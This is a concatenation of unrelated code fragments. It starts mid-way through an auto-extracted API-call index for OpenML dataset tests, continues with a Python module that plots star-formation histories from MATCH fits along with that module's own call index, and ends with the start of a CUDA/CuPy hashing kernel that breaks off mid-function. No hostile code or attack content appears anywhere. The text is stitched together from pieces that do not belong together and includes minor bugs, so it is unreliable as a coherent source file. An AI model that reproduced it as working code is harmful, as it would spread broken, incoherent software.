{}), '(self.static_cache_dir)\n', (3321, 3344), False, 'import openml\n'), ((3686, 3742), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3719, 3742), False, 'import openml\n'), ((3765, 3829), 'openml.datasets.functions._get_cached_dataset_arff', 'openml.datasets.functions._get_cached_dataset_arff', ([], {'dataset_id': '(2)'}), '(dataset_id=2)\n', (3815, 3829), False, 'import openml\n'), ((3955, 4011), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3988, 4011), False, 'import openml\n'), ((4448, 4479), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {}), '()\n', (4477, 4479), False, 'import openml\n'), ((4724, 4769), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {'tag': '"""study_14"""'}), "(tag='study_14')\n", (4753, 4769), False, 'import openml\n'), ((5368, 5414), 'openml.datasets.check_datasets_active', 'openml.datasets.check_datasets_active', (['[1, 17]'], {}), '([1, 17])\n', (5405, 5414), False, 'import openml\n'), ((5783, 5817), 'openml.datasets.get_datasets', 'openml.datasets.get_datasets', (['dids'], {}), '(dids)\n', (5811, 5817), False, 'import openml\n'), ((7016, 7046), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(1)'], {}), '(1)\n', (7043, 7046), False, 'import openml\n'), ((7874, 7906), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(101)'], {}), '(101)\n', (7901, 7906), False, 'import openml\n'), ((8092, 8124), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(102)'], {}), '(102)\n', (8119, 8124), False, 'import openml\n'), ((8365, 8397), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['did'], {}), '(did)\n', (8392, 8397), False, 'import openml\n'), ((8528, 8569), 'openml.datasets.functions._get_dataset_description', '_get_dataset_description', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (8552, 8569), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((8650, 8695), 'os.path.join', 'os.path.join', (['self.workdir', '"""description.xml"""'], {}), "(self.workdir, 'description.xml')\n", (8662, 8695), False, 'import os\n'), ((8858, 8914), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (8891, 8914), False, 'import openml\n'), ((8937, 8997), 'openml.datasets.functions._get_cached_dataset_description', 'openml.datasets.functions._get_cached_dataset_description', (['(2)'], {}), '(2)\n', (8994, 8997), False, 'import openml\n'), ((9018, 9062), 'openml.datasets.functions._get_dataset_arff', '_get_dataset_arff', (['self.workdir', 'description'], {}), '(self.workdir, description)\n', (9035, 9062), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((9710, 9748), 'openml.datasets.functions._get_dataset_features', '_get_dataset_features', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (9731, 9748), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((9823, 9865), 'os.path.join', 'os.path.join', (['self.workdir', '"""features.xml"""'], {}), "(self.workdir, 'features.xml')\n", (9835, 9865), False, 'import os\n'), ((10018, 10057), 'openml.datasets.functions._get_dataset_qualities', '_get_dataset_qualities', (['self.workdir', '(2)'], {}), '(self.workdir, 2)\n', (10040, 10057), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((10197, 10257), 'openml.datasets.functions._create_dataset_cache_directory', 'openml.datasets.functions._create_dataset_cache_directory', (['(1)'], {}), '(1)\n', (10254, 10257), False, 'import openml\n'), ((10335, 10401), 'openml.datasets.functions._remove_dataset_cache_dir', 'openml.datasets.functions._remove_dataset_cache_dir', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10386, 10401), False, 'import openml\n'), ((10914, 10952), 'os.path.join', 'os.path.join', (['self.workdir', '"""datasets"""'], {}), "(self.workdir, 'datasets')\n", (10926, 10952), False, 'import os\n'), ((11073, 11103), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(3)'], {}), '(3)\n', (11100, 11103), False, 'import openml\n'), ((11258, 11409), 'openml.OpenMLDataset', 'OpenMLDataset', ([], {'name': '"""anneal"""', 'version': '(1)', 'description': '"""test"""', 'format': '"""ARFF"""', 'licence': '"""public"""', 'default_target_attribute': '"""class"""', 'data_file': 'file_path'}), "(name='anneal', version=1, description='test', format='ARFF',\n licence='public', default_target_attribute='class', data_file=file_path)\n", (11271, 11409), False, 'from openml import OpenMLDataset\n'), ((11564, 11620), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (11597, 11620), False, 'import openml\n'), ((11982, 12144), 'openml.OpenMLDataset', 'OpenMLDataset', ([], {'name': '"""UploadTestWithURL"""', 'version': '(1)', 'description': '"""test"""', 'format': '"""ARFF"""', 'url': '"""https://www.openml.org/data/download/61/dataset_61_iris.arff"""'}), "(name='UploadTestWithURL', version=1, description='test',\n format='ARFF', url=\n 'https://www.openml.org/data/download/61/dataset_61_iris.arff')\n", (11995, 12144), False, 'from openml import OpenMLDataset\n'), ((5039, 5089), 'openml.datasets.list_datasets', 'openml.datasets.list_datasets', ([], {'offset': 'i', 'size': 'size'}), '(offset=i, size=size)\n', (5068, 5089), False, 'import openml\n'), ((8764, 8800), 'os.path.exists', 'os.path.exists', (['description_xml_path'], {}), '(description_xml_path)\n', (8778, 8800), False, 'import os\n'), ((9133, 9158), 'os.path.exists', 'os.path.exists', (['arff_path'], {}), '(arff_path)\n', (9147, 9158), False, 'import os\n'), ((9890, 9923), 'os.path.exists', 'os.path.exists', (['features_xml_path'], {}), '(features_xml_path)\n', (9904, 9923), False, 'import os\n'), ((10296, 10325), 'os.path.exists', 'os.path.exists', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10310, 10325), False, 'import os\n'), ((10427, 10456), 'os.path.exists', 'os.path.exists', (['did_cache_dir'], {}), '(did_cache_dir)\n', (10441, 10456), False, 'import os\n'), ((11137, 11172), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (11170, 11172), False, 'import openml\n'), ((1447, 1502), 'os.path.join', 'os.path.join', (['cache_dir', '"""datasets"""', 'did', '"""dataset.pkl"""'], {}), "(cache_dir, 'datasets', did, 'dataset.pkl')\n", (1459, 1502), False, 'import os\n'), ((10982, 11012), 'os.listdir', 'os.listdir', (['datasets_cache_dir'], {}), '(datasets_cache_dir)\n', (10992, 11012), False, 'import os\n'), ((11638, 11668), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(2)'], {}), '(2)\n', (11665, 11668), False, 'import openml\n'), ((11775, 11805), 'openml.datasets.get_dataset', 'openml.datasets.get_dataset', (['(2)'], {}), '(2)\n', (11802, 11805), False, 'import openml\n'), ((1587, 1609), 'os.remove', 'os.remove', (['pickle_path'], {}), '(pickle_path)\n', (1596, 1609), False, 'import os\n'), ((5926, 5961), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (5959, 5961), False, 'import openml\n'), ((6066, 6101), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6099, 6101), False, 'import openml\n'), ((6206, 6241), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6239, 6241), False, 'import openml\n'), ((6343, 6378), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6376, 6378), False, 'import openml\n'), ((6480, 6515), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6513, 6515), False, 'import openml\n'), ((6617, 6652), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6650, 6652), False, 'import openml\n'), ((6754, 6789), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6787, 6789), False, 'import openml\n'), ((6892, 6927), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (6925, 6927), False, 'import openml\n'), ((7216, 7251), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7249, 7251), False, 'import openml\n'), ((7356, 7391), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7389, 7391), False, 'import openml\n'), ((7493, 7528), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7526, 7528), False, 'import openml\n'), ((7630, 7665), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (7663, 7665), False, 'import openml\n'), ((1355, 1390), 'openml.config.get_cache_directory', 'openml.config.get_cache_directory', ([], {}), '()\n', (1388, 1390), False, 'import openml\n')]
|
from __future__ import print_function
import argparse
import logging
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
from .config import EXT
from .fileio import read_binned_sfh
from .utils import convertz, parse_pipeline, float2sci
logger = logging.getLogger()
def mh2z(num):
return 0.02 * 10 ** num
def quadriture(x):
return np.sqrt(np.sum(x * x))
class SFH(object):
'''
load the match sfh solution as a class with attributes set by the
best fits from the sfh file.
'''
def __init__(self, filename, hmc_file=None, meta_file=None):
"""
Parameters
----------
filename : str
data file
hmc_file : str
data file from which to overwite uncertainties
meta_file : str
data file to only read bestfit line.
"""
self.base, self.name = os.path.split(filename)
self.data = read_binned_sfh(filename, hmc_file)
if meta_file is None:
meta_file = filename
self.load_match_header(meta_file)
def load_match_header(self, filename):
'''
assumes header is from line 0 to 6 and sets footer to be the final
line of the file
header formatting is important:
Line # format requirement
first Ends with "= %f (%s)"
N is the string "Best fit:\n"
N+1 has ',' separated strings of "%s=%f+%f-%f"
last is formatted "%s %f %f %f"
'''
def set_value_err_attr(key, attr, pattr, mattr):
'''
set attributes [key], [key]_perr, [key]_merr
to attr, pattr, mattr (must be floats)
'''
self.__setattr__(key, float(attr))
self.__setattr__(key + '_perr', float(pattr))
self.__setattr__(key + '_merr', float(mattr))
with open(filename, 'r') as infile:
lines = infile.readlines()
if len(lines) == 0:
print('empty file: %s' % filename)
self.header = []
self.footer = []
self.bestfit = np.nan
self.match_out = ''
self.data = np.array([])
return
self.header = lines[0:6]
self.footer = lines[-1]
try:
bestfit, fout = \
self.header[0].replace(' ', '').split('=')[1].split('(')
self.bestfit = float(bestfit)
self.match_out = fout.split(')')[0]
try:
iline = self.header.index('Best fit:\n') + 1
except ValueError:
print('Need Best fit line to assign attributes')
raise ValueError
line = self.header[iline].strip().replace(' ', '').split(',')
for i in line:
key, attrs = i.split('=')
attr, pmattr = attrs.split('+')
pattr, mattr = pmattr.split('-')
set_value_err_attr(key, attr, pattr, mattr)
# the final line has totalSF
key, attr, pattr, mattr = self.header[-1].strip().split()
set_value_err_attr(key, attr, pattr, mattr)
except:
# zcmerge files: the first line has totalSF
self.header = lines[0]
self.footer = ['']
try:
key, attr, pattr, mattr = self.header.strip().split()
set_value_err_attr(key, attr, pattr, mattr)
except:
# no header
pass
self.flag = None
if np.sum(np.diff(self.data.mh)) == 0:
self.flag = 'setz'
if len(np.nonzero(np.diff(self.data.mh) >= 0)[0]) == len(self.data.mh):
self.flag = 'zinc'
return
def mh2z(self, num):
"""nore really [M/H] """
return 0.02 * 10 ** num
def plot_bins(self, val='sfr', err=False, convertz=False, offset=1.):
'''make SFH bins for plotting'''
if isinstance(val, str):
if err:
valm = self.data['%s_errm' % val] * offset
valp = self.data['%s_errp' % val] * offset
val = self.data[val] * offset
if convertz:
val = mh2z(val)
if err:
valm = mh2z(valm)
valp = mh2z(valp)
lagei = self.data.lagei
lagef = self.data.lagef
# double up value
# lagei_i, lagef_i, lagei_i+1, lagef_i+1 ...
lages = np.ravel([(lagei[i], lagef[i]) for i in range(len(lagei))])
vals = np.ravel([(val[i], val[i]) for i in range(len(val))])
if err:
valm = np.ravel([(valm[i], valm[i]) for i in range(len(val))])
valp = np.ravel([(valp[i], valp[i]) for i in range(len(val))])
data = (vals, valm, valp)
else:
data = vals
return lages, data
def age_plot(self, val='sfr', ax=None, plt_kw={}, errors=True,
convertz=False, xlabel=None, ylabel=None,
sfr_offset=1e3):
plt_kw = dict({'lw': 3, 'color': 'black'}, **plt_kw)
eplt_kw = plt_kw.copy()
eplt_kw.update({'linestyle': 'None'})
lages, sfrs = self.plot_bins(offset=sfr_offset)
rlages, (rsfrs, sfr_merrs, sfr_perrs) = \
self.plot_bins(err=True, offset=sfr_offset)
rlages = np.append(self.data['lagei'], self.data['lagef'][-1])
rlages = rlages[:-1] + np.diff(rlages) / 2.
rsfrs = self.data['sfr'] * sfr_offset
rsfr_merrs = self.data['sfr_errm'] * sfr_offset
rsfr_perrs = self.data['sfr_errp'] * sfr_offset
lages = 10 ** (lages - 9.)
rlages = 10 ** (rlages - 9.)
if val != 'sfr':
lages, vals = self.plot_bins(val=val, convertz=convertz)
# mask values with no SF
isfr, = np.nonzero(sfrs == 0)
vals[isfr] = np.nan
if self.flag != 'setz':
rlages, (rvals, val_merrs, val_perrs) = \
self.plot_bins(val=val, err=True)
# mask values with no SF
irsfr, = np.nonzero(rsfrs == 0)
val_merrs[irsfr] = 0.
val_perrs[irsfr] = 0.
if np.sum(val_merrs) == 0 or np.sum(val_perrs) == 0:
errors = False
else:
errors = False
if 'mh' in val:
if ylabel is not None:
ylabel = r'$\rm{[M/H]}$'
if convertz:
ylabel = r'$Z$'
else:
ylabel = r'$SFR\ %s\ (\rm{M_\odot/yr})$' % \
float2sci(1. / sfr_offset).replace('$', '')
vals = sfrs
rvals = rsfrs
val_merrs = rsfr_merrs
val_perrs = rsfr_perrs
if ax is None:
_, ax = plt.subplots()
xlabel = r'$\log Age\ \rm{(yr)}$'
ax.plot(lages, vals, **plt_kw)
if errors:
ax.errorbar(rlages, rvals, yerr=[val_merrs, val_perrs], **eplt_kw)
if xlabel is not None:
ax.set_xlabel(xlabel, fontsize=20)
if ylabel is not None:
ax.set_ylabel(ylabel, fontsize=20)
return ax
def plot_csfr(self, ax=None, errors=True, plt_kw={}, fill_between_kw={},
xlim=None, ylim=(-0.01, 1.01), data=True):
'''cumulative sfr plot from match'''
one_off = False
if ax is None:
fig, ax = plt.subplots(figsize=(8, 8))
plt.subplots_adjust(right=0.95, left=0.1, bottom=0.1, top=0.95)
ax.tick_params(direction='in')
one_off = True
fill_between_kw = dict({'alpha': 1, 'color': 'gray'},
**fill_between_kw)
plt_kw = dict({'lw': 3}, **plt_kw)
# lages, (csfh, csfh_errm, csfh_errp) = self.plot_bins(val='csfr',
# err=True)
lages = self.data['lagei']
csfh = self.data['csfr']
csfh_errm = self.data['csfr_errm']
csfh_errp = self.data['csfr_errp']
age = 10 ** (lages - 9.)
# age = lages
age = np.append(age, 10 ** (self.data['lagef'][-1] - 9))
csfh = np.append(csfh, 0)
csfh_errm = np.append(csfh_errm, 0)
csfh_errp = np.append(csfh_errp, 0)
if errors:
ax.fill_between(age, csfh - csfh_errm, csfh + csfh_errp,
**fill_between_kw)
if data:
ax.plot(age, csfh, **plt_kw)
if xlim is not None:
ax.set_xlim(xlim)
ax.set_ylim(ylim)
# ax.set_xscale('log')
# ax.xaxis.set_major_locator(LogNLocator)
if one_off:
ax.set_xlabel('$\\rm{Star\ Formation\ Time\ (Gyr)}$', fontsize=20)
ax.set_ylabel('$\\rm{Culmulative\ Star\ Formation}$', fontsize=20)
plt.legend(loc=0, frameon=False)
if 'label' in plt_kw.keys():
outfile = \
'{}_csfr'.format(plt_kw['label'].replace('$', '').lower(),
EXT)
else:
outfile = \
'{}_csfr{}'.format(os.path.join(self.base, self.name), EXT)
plt.savefig(outfile)
print('wrote {}'.format(outfile))
return ax
def sf_weighted_metallicity(self):
agebins = (10 ** self.data.lagef - 10 ** self.data.lagei)
totalsf = np.sum(self.data.sfr * agebins)
fracsf = (self.data.sfr * agebins) / totalsf
feh = np.array([convertz(z=0.02 * 10 ** m)[-2] for m in self.data.mh])
return np.sum(fracsf * feh)
def param_table(self, angst=True, agesplit=[1e9, 3e9], target='',
filters=['', '']):
try:
dic = {'bestfit': self.bestfit, 'Av': self.Av, 'dmod': self.dmod}
except:
print('No bestfit info')
dic = {'bestfit': np.nan, 'Av': np.nan, 'dmod': np.nan}
dic['header'] = \
(r'Galaxy & Optical Filters & A$_V$ & $(m\!-\!M)_0$ &'
r'$\% \frac{{\rm{{SF}}}}{{\rm{{SF_{{TOT}}}}}}$ &'
r'$\langle \mbox{{[Fe/H]}} \rangle$ &'
r'$\% \frac{{\rm{{SF}}}}{{\rm{{SF_{{TOT}}}}}}$ &'
r'$\langle \mbox{{[Fe/H]}} \rangle$ & $bestfit$ \\ & & & & '
r'\multicolumn{{2}}{{c}}{{$<{0}\rm{{Gyr}}$}} & '
r'\multicolumn{{2}}{{c}}{{${0}-{1}\rm{{Gyr}}$}} & \\ \hline'
'\n'.format(*agesplit))
dic['target'] = target
if angst:
try:
dic['target'], filters = parse_pipeline(self.name)
except:
pass
dic['filters'] = ','.join(filters)
fyng, fyng_errp, fyng_errm = self.mass_fraction(0, agesplit[0])
fint, fint_errp, fint_errm = self.mass_fraction(agesplit[0],
agesplit[1])
# logZ = 0 if there is no SF, that will add error to mean Fe/H
iyng = self.nearest_age(agesplit[0], i=False)
iint = self.nearest_age(agesplit[1], i=False)
iyngs, = np.nonzero(self.data.mh[:iyng + 1] != 0)
iints, = np.nonzero(self.data.mh[:iint + 1] != 0)
iints = list(set(iints) - set(iyngs))
feh_yng = convertz(z=mh2z(np.mean(self.data.mh[iyngs])))[-2]
feh_int = convertz(z=mh2z(np.mean(self.data.mh[iints])))[-2]
feh_yng_errp = \
convertz(z=mh2z(quadriture(self.data.mh_errp[iyngs])))[-2]
feh_yng_errm = \
convertz(z=mh2z(quadriture(self.data.mh_errm[iyngs])))[-2]
feh_int_errp = \
convertz(z=mh2z(quadriture(self.data.mh_errp[iints])))[-2]
feh_int_errm = \
convertz(z=mh2z(quadriture(self.data.mh_errm[iints])))[-2]
maf = '${0: .2f}^{{+{1: .2f}}}_{{-{2: .2f}}}$'
dic['fyng'], dic['fint'] = \
[maf.format(v, p, m) for v, p, m in zip([fyng, fint],
[fyng_errp, fint_errp],
[fyng_errm, fint_errm])]
dic['feh_yng'], dic['feh_int'] = \
[maf.format(v, p, m) for v, p, m in
zip([feh_yng, feh_int],
[feh_yng_errp, feh_int_errp],
[feh_yng_errm, feh_int_errm])]
line = ['{target}', '{filters}', '{Av: .2f}', '{dmod: .2f}',
'{fyng}', '{feh_yng}', '{fint}', '{feh_int}']
dic['fmt'] = '%s \\\\ \n' % (' & '.join(line))
return dic
def nearest_age(self, lage, i=True):
if lage > 10.15:
lage = np.log10(lage)
logger.warning('converting input age to log age')
age_arr = self.data.lagef
msg = 'lagef'
if i:
age_arr = self.data.lagei
msg = 'lagei'
# min age bin size, will trigger warning if ages requested are
# higher than the min binsize.
tol = np.min(np.diff(age_arr))
# find closest age bin to lage
idx = np.argmin(np.abs(age_arr - lage))
difi = np.abs(age_arr[idx] - lage)
if difi > tol:
logger.warning(('input {}={} not found. ',
'Using {}').format(msg, lage, age_arr[idx]))
return idx
def mass_fraction(self, lagei, lagef):
"""
Return the fraction of total mass formed between lagei and lagef.
lage[] units can be log yr or yr.
Multiply by self.totalSF to obtain the mass formed.
"""
agebins = (10 ** self.data.lagef - 10 ** self.data.lagei)
if lagef-lagei < np.min(np.diff(self.data.lagei)):
logger.error('Age difference smaller than bin sizes (or negative)')
return 0, 0, 0
# higher precision than self.totalSF
totalsf = np.sum(self.data.sfr * agebins)
idxi = self.nearest_age(lagei)
# +1 is to include final bin
idxf = self.nearest_age(lagef, i=False) + 1
fracsfr = np.sum(self.data.sfr[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
fracsfr_errp = quadriture(self.data.sfr_errp[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
fracsfr_errm = quadriture(self.data.sfr_errm[idxi:idxf] *
agebins[idxi:idxf]) / totalsf
return fracsfr, fracsfr_errp, fracsfr_errm
def sfh_plot(self):
from matplotlib.ticker import NullFormatter
_, (ax1, ax2) = plt.subplots(nrows=2)
self.age_plot(ax=ax1)
self.age_plot(val='mh', convertz=False, ax=ax2)
ax1.xaxis.set_major_formatter(NullFormatter())
plt.subplots_adjust(hspace=0.1)
figname = os.path.join(self.base, self.name + EXT)
print('wrote {}'.format(figname))
plt.savefig(figname)
plt.close()
def main(argv):
"""
Main function for sfh.py plot sfh output from calcsfh, zcombine, or zcmerge
"""
parser = argparse.ArgumentParser(description="Plot match sfh")
parser.add_argument('sfh_files', nargs='*', type=str,
help='ssp output(s) or formated output(s)')
args = parser.parse_args(argv)
for sfh_file in args.sfh_files:
msfh = SFH(sfh_file)
if len(msfh.data) != 0:
msfh.sfh_plot()
msfh.plot_csfr()
# dic = msfh.param_table()
# print(dic['fmt'].format(**dic))
if __name__ == '__main__':
main(sys.argv[1:])
|
[
"matplotlib.pyplot.savefig",
"numpy.sum",
"argparse.ArgumentParser",
"numpy.abs",
"os.path.join",
"matplotlib.pyplot.close",
"matplotlib.pyplot.legend",
"numpy.nonzero",
"numpy.append",
"numpy.diff",
"numpy.array",
"matplotlib.ticker.NullFormatter",
"numpy.mean",
"matplotlib.pyplot.subplots_adjust",
"numpy.log10",
"os.path.split",
"matplotlib.pyplot.subplots",
"logging.getLogger"
] |
[((268, 287), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (285, 287), False, 'import logging\n'), ((14995, 15048), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot match sfh"""'}), "(description='Plot match sfh')\n", (15018, 15048), False, 'import argparse\n'), ((373, 386), 'numpy.sum', 'np.sum', (['(x * x)'], {}), '(x * x)\n', (379, 386), True, 'import numpy as np\n'), ((887, 910), 'os.path.split', 'os.path.split', (['filename'], {}), '(filename)\n', (900, 910), False, 'import os\n'), ((5345, 5398), 'numpy.append', 'np.append', (["self.data['lagei']", "self.data['lagef'][-1]"], {}), "(self.data['lagei'], self.data['lagef'][-1])\n", (5354, 5398), True, 'import numpy as np\n'), ((8162, 8212), 'numpy.append', 'np.append', (['age', "(10 ** (self.data['lagef'][-1] - 9))"], {}), "(age, 10 ** (self.data['lagef'][-1] - 9))\n", (8171, 8212), True, 'import numpy as np\n'), ((8228, 8246), 'numpy.append', 'np.append', (['csfh', '(0)'], {}), '(csfh, 0)\n', (8237, 8246), True, 'import numpy as np\n'), ((8267, 8290), 'numpy.append', 'np.append', (['csfh_errm', '(0)'], {}), '(csfh_errm, 0)\n', (8276, 8290), True, 'import numpy as np\n'), ((8311, 8334), 'numpy.append', 'np.append', (['csfh_errp', '(0)'], {}), '(csfh_errp, 0)\n', (8320, 8334), True, 'import numpy as np\n'), ((9456, 9487), 'numpy.sum', 'np.sum', (['(self.data.sfr * agebins)'], {}), '(self.data.sfr * agebins)\n', (9462, 9487), True, 'import numpy as np\n'), ((9635, 9655), 'numpy.sum', 'np.sum', (['(fracsf * feh)'], {}), '(fracsf * feh)\n', (9641, 9655), True, 'import numpy as np\n'), ((11125, 11165), 'numpy.nonzero', 'np.nonzero', (['(self.data.mh[:iyng + 1] != 0)'], {}), '(self.data.mh[:iyng + 1] != 0)\n', (11135, 11165), True, 'import numpy as np\n'), ((11183, 11223), 'numpy.nonzero', 'np.nonzero', (['(self.data.mh[:iint + 1] != 0)'], {}), '(self.data.mh[:iint + 1] != 0)\n', (11193, 11223), True, 'import numpy as np\n'), ((13096, 13123), 'numpy.abs', 'np.abs', (['(age_arr[idx] - lage)'], {}), '(age_arr[idx] - lage)\n', (13102, 13123), True, 'import numpy as np\n'), ((13834, 13865), 'numpy.sum', 'np.sum', (['(self.data.sfr * agebins)'], {}), '(self.data.sfr * agebins)\n', (13840, 13865), True, 'import numpy as np\n'), ((14515, 14536), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)'}), '(nrows=2)\n', (14527, 14536), True, 'import matplotlib.pyplot as plt\n'), ((14686, 14717), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'hspace': '(0.1)'}), '(hspace=0.1)\n', (14705, 14717), True, 'import matplotlib.pyplot as plt\n'), ((14736, 14776), 'os.path.join', 'os.path.join', (['self.base', '(self.name + EXT)'], {}), '(self.base, self.name + EXT)\n', (14748, 14776), False, 'import os\n'), ((14827, 14847), 'matplotlib.pyplot.savefig', 'plt.savefig', (['figname'], {}), '(figname)\n', (14838, 14847), True, 'import matplotlib.pyplot as plt\n'), ((14856, 14867), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14865, 14867), True, 'import matplotlib.pyplot as plt\n'), ((2164, 2176), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (2172, 2176), True, 'import numpy as np\n'), ((5834, 5855), 'numpy.nonzero', 'np.nonzero', (['(sfrs == 0)'], {}), '(sfrs == 0)\n', (5844, 5855), True, 'import numpy as np\n'), ((6830, 6844), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6842, 6844), True, 'import matplotlib.pyplot as plt\n'), ((7457, 7485), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(8, 8)'}), '(figsize=(8, 8))\n', (7469, 7485), True, 'import matplotlib.pyplot as plt\n'), ((7498, 7561), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'right': '(0.95)', 'left': '(0.1)', 'bottom': '(0.1)', 'top': '(0.95)'}), '(right=0.95, left=0.1, bottom=0.1, top=0.95)\n', (7517, 7561), True, 'import matplotlib.pyplot as plt\n'), ((8886, 8918), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0)', 'frameon': '(False)'}), '(loc=0, frameon=False)\n', (8896, 8918), True, 'import matplotlib.pyplot as plt\n'), ((9247, 9267), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {}), '(outfile)\n', (9258, 9267), True, 'import matplotlib.pyplot as plt\n'), ((12631, 12645), 'numpy.log10', 'np.log10', (['lage'], {}), '(lage)\n', (12639, 12645), True, 'import numpy as np\n'), ((12974, 12990), 'numpy.diff', 'np.diff', (['age_arr'], {}), '(age_arr)\n', (12981, 12990), True, 'import numpy as np\n'), ((13057, 13079), 'numpy.abs', 'np.abs', (['(age_arr - lage)'], {}), '(age_arr - lage)\n', (13063, 13079), True, 'import numpy as np\n'), ((14013, 14066), 'numpy.sum', 'np.sum', (['(self.data.sfr[idxi:idxf] * agebins[idxi:idxf])'], {}), '(self.data.sfr[idxi:idxf] * agebins[idxi:idxf])\n', (14019, 14066), True, 'import numpy as np\n'), ((14661, 14676), 'matplotlib.ticker.NullFormatter', 'NullFormatter', ([], {}), '()\n', (14674, 14676), False, 'from matplotlib.ticker import NullFormatter\n'), ((3542, 3563), 'numpy.diff', 'np.diff', (['self.data.mh'], {}), '(self.data.mh)\n', (3549, 3563), True, 'import numpy as np\n'), ((5430, 5445), 'numpy.diff', 'np.diff', (['rlages'], {}), '(rlages)\n', (5437, 5445), True, 'import numpy as np\n'), ((6102, 6124), 'numpy.nonzero', 'np.nonzero', (['(rsfrs == 0)'], {}), '(rsfrs == 0)\n', (6112, 6124), True, 'import numpy as np\n'), ((13636, 13660), 'numpy.diff', 'np.diff', (['self.data.lagei'], {}), '(self.data.lagei)\n', (13643, 13660), True, 'import numpy as np\n'), ((9194, 9228), 'os.path.join', 'os.path.join', (['self.base', 'self.name'], {}), '(self.base, self.name)\n', (9206, 9228), False, 'import os\n'), ((6220, 6237), 'numpy.sum', 'np.sum', (['val_merrs'], {}), '(val_merrs)\n', (6226, 6237), True, 'import numpy as np\n'), ((6246, 6263), 'numpy.sum', 'np.sum', (['val_perrs'], {}), '(val_perrs)\n', (6252, 6263), True, 'import numpy as np\n'), ((11305, 11333), 'numpy.mean', 'np.mean', (['self.data.mh[iyngs]'], {}), '(self.data.mh[iyngs])\n', (11312, 11333), True, 'import numpy as np\n'), ((11374, 11402), 'numpy.mean', 'np.mean', (['self.data.mh[iints]'], {}), '(self.data.mh[iints])\n', (11381, 11402), True, 'import numpy as np\n'), ((3628, 3649), 'numpy.diff', 'np.diff', (['self.data.mh'], {}), '(self.data.mh)\n', (3635, 3649), True, 'import numpy as np\n')]
|
import torch
from cupy_kernel import cupyKernel
import numpy as np
import math
kernel = '''
extern "C"
__inline__ __device__
int hash(int value, int range, int a, int b)
{
int h = a * value + b;
h ^= h >> 16;
h *= 0x85ebca6b;
h ^= h >> 13;
h *= 0xc2b2ae35;
h ^= h >> 16;
return h % range;
}
extern "C"
__inline__ __device__
float minimum(float a, float b, float c)
{
return fminf(fminf(a,b),c);
}
extern "C"
__inline__ __device__
float update_retrieve(float* mem,
float* result,
const float beta,
const int N,
const int D,
const long index,
const float value)
{
int a = 994443;
int b = 609478;
const int hash_idx = hash(index, N, a, b) * D + threadIdx.x;
float old_value = mem[hash_idx];
float update = (1. - beta) * (value - old_value);
atomicAdd(&mem[hash_idx], update);
return old_value + update;
}
extern "C"
__inline__ __device__
float cms_update_retrieve(float* mem,
float* result,
const float beta,
const int N,
const int W,
const int D,
const long index,
const float value)
{
float r[3];
int a[3] = {994443, 4113759, 9171025};
